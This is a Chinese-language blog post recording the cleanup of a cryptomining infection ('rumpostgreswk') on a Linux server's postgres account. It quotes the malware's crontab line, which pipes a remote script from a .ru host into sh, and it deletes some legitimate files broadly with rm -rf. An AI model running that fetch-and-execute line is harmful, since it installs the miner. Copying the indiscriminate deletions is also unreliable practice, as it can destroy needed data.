消灭Linux挖矿病毒rumpostgreswk

  • Post author:
  • Post category:linux




病毒定时任务

查看定时任务
sudo crontab -u postgres -l

[root@master ~]# sudo crontab -u postgres -l
*/30 * * * * /home/postgres//home/postgres/data/./oka
* */6 * * * wget -q -O- http://xmr.linux1213.ru:2019/back.sh | sh

删除postgres用户的定时任务
sudo crontab -u postgres -r



把它的配置文件改错,把user瞎改一下保存

[root@master tmp]# ll
total 3740
-rw-r--r-- 1 postgres postgres    4998 Sep  7 12:30 config.json 【病毒配置文件】

在这里插入图片描述

杀掉进程top里占用高的病毒进程,有好几个,一个占用900%,还有3个进程260%

kill -9 pid

病毒会重启,因为现在配置文件里user不对,他cpu占用非常低了

在这里插入图片描述



清理病毒

[root@master postgres]# ps -ef|grep postgres
postgres    4951       1  0 Aug19 ?        00:01:42 /home/pgsql-13/bin/postgres -D /home/postgres/data
postgres    4952    4951  0 Aug19 ?        00:00:00 postgres: logger 
postgres  465390    4951  0 Aug24 ?        00:00:00 postgres: checkpointer 
postgres  465394    4951  0 Aug24 ?        00:00:45 postgres: stats collector 
postgres  514192       1  0 Sep07 ?        00:09:24 ./postgres_dm 【病毒】
postgres  595504    4951  0 Sep08 ?        00:00:00 postgres: postgres postgres 221.179.41.77(43147) COPY
postgres  595505  595504  0 Sep08 ?        00:00:00 [sh] <defunct> 【病毒】
postgres  595667       1  0 Sep08 ?        00:00:01 ./nicosoft 【病毒】
postgres  857869       1  0 10:16 ?        00:00:00 /tmp/rumpostgreswk --config=/tmp/config.json 【病毒】
root      859111  856813  0 10:21 pts/2    00:00:00 grep --color=auto postgres
[root@master postgres]# 

杀进程并清理病毒文件

kill -9 514192



病毒环境

在这里插入图片描述

健康环境

在这里插入图片描述

删除病毒文件

[root@master postgres]# ls -a
.  ..  .bash_history  .bash_logout  .bash_profile  .bashrc  .cache  .config  data  .mozilla  oka.pid  .pki  .psql_history  run  .ssh  .systemd-private-WwJhetgADxSSRc9QVwatN7pscFzyPcaG.sh
[root@master postgres]# cd /home/psotgres
-bash: cd: /home/psotgres: No such file or directory
[root@master postgres]# pwd
/home/postgres
[root@master postgres]# rm -rf .cache
[root@master postgres]# rm -rf .config
[root@master postgres]# rm -rf .mozilla
[root@master postgres]# rm -rf .pki
[root@master postgres]# rm -rf .ssh
[root@master postgres]# rm -rf .systemd-private-WwJhetgADxSSRc9QVwatN7pscFzyPcaG.sh 
[root@master postgres]# ls -a
.  ..  .bash_history  .bash_logout  .bash_profile  .bashrc  data  oka.pid  .psql_history  run
[root@master postgres]# 

删除干净后

在这里插入图片描述

病毒环境/home/postgres/data

在这里插入图片描述

正常环境

在这里插入图片描述

把病毒删除干净后

在这里插入图片描述

/tmp目录清理

[root@master tmp]# ll
total 3740
-rw------- 1 postgres postgres       6 Sep  9 10:25 APP_PID_PG
-rw-r--r-- 1 postgres postgres    5009 Sep  9 10:14 config.json
-rw------- 1 postgres postgres       0 Sep  9 10:16 err
drwxr-xr-x 2 root     root        4096 Aug 20 11:11 hsperfdata_root
-rwxrwxrwx 1 postgres postgres    1801 Sep  7 12:26 kp
-rwxrwxrwx 1 postgres postgres   17560 Sep  7 12:26 postgres_dm
-rwxrwxrwx 1 postgres postgres   17000 Sep  7 12:26 ps
-rwxrwxrwx 1 postgres postgres 2363684 Sep  7 12:26 rumpostgreswk
drwx------ 2 root     root        4096 Sep  3 15:15 ssh-igDyihENOxs7
drwx------ 3 root     root        4096 Sep  3 15:15 systemd-private-362fbb39ebfb4562ac97687f1a79fd33-bolt.service-SGniGr
drwx------ 3 root     root        4096 Sep  3 15:15 systemd-private-362fbb39ebfb4562ac97687f1a79fd33-colord.service-Uylc9K
drwx------ 3 root     root        4096 Aug 19 10:06 systemd-private-362fbb39ebfb4562ac97687f1a79fd33-cups.service-9YsK4c
drwx------ 3 root     root        4096 Sep  3 15:15 systemd-private-362fbb39ebfb4562ac97687f1a79fd33-fwupd.service-s7MmVj
drwx------ 2 root     root        4096 Sep  3 15:15 tracker-extract-files.0
-rw------- 1 root     root      194875 Sep  3 15:18 yum_save_tx.2021-09-03.15-18.OZhgz0.yumtx
-rw------- 1 root     root      194875 Sep  4 06:17 yum_save_tx.2021-09-04.06-17.KwelGc.yumtx
-rw------- 1 root     root      194875 Sep  5 06:17 yum_save_tx.2021-09-05.06-17.EHGFsZ.yumtx
-rw------- 1 root     root      194875 Sep  6 06:17 yum_save_tx.2021-09-06.06-17.FcFI2_.yumtx
-rw------- 1 root     root      194875 Sep  7 06:17 yum_save_tx.2021-09-07.06-17.ZUNA4m.yumtx
-rw------- 1 root     root      194875 Sep  8 06:17 yum_save_tx.2021-09-08.06-17.dm7MAz.yumtx
-rw------- 1 root     root      194875 Sep  9 06:17 yum_save_tx.2021-09-09.06-17.uNNV0n.yumtx
[root@master tmp]# rm -rf kp
[root@master tmp]# rm -rf postgres_dm 
[root@master tmp]# rm -rf ps
[root@master tmp]# rm -rf rumpostgreswk 
[root@master tmp]# rm -rf ssh-igDyihENOxs7/
[root@master tmp]# rm -rf tracker-extract-files.0
[root@master tmp]# rm -rf yum*
...

把异常的文件都删掉后

在这里插入图片描述



预防

给postgres用户设置复杂密码

echo '复杂密码'|passwd --stdin postgres

打开防火墙?不利于大数据环境,没有打开

ssh登陆配置,可以设置只允许root用户之外的普通用户登陆,以免病毒获取root用户超级权限;

把用户的密码都改复杂点,避免爆破ssh登陆病毒侵入;数据库连接密码也应该设置复杂,避免数据库漏洞病毒侵入



版权声明:本文为qq_42158942原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。